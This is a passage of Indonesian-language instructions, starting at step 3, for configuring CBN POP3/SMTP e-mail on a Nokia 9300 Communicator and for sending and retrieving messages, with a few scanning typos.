3. Pada Servers tab, ketik seperti di bawah ini: • E-mail account type: POP3 • Outgoing Mail: smtp.cbn.net.id • Incoming Mail: pop.cbn.net.id • Use Authentication: No
4. Tekan "Done" > "Exit" sampai Anda keluar dan kembali pada mail window.
5. Untuk rnengirim e-mail, silahkan ikuti instruksi di bawah ini:
6. Tekan menu aphkasi "Messaging" pada keyboard Communicator.
7. Pilih "VVrite message" >"'E-mail".
8. Ketikkan alamat e-mail penerima pada "To", dan ketikkan pesan Anda pada body messagenya, seperti rnenulis e-mail biasa, lalu tekan "Send".
9. Untuk men-download e-mail Anda, silakan ikuti instruksi di bawah ini
10.Tekan menu aplikasi Messaging pada keyboard Communicator.
11. Lalu Tekan "retrieve e-mail".
Demikianlah setting-an koneksi untuk Nokia 9300, selamat mencoba!
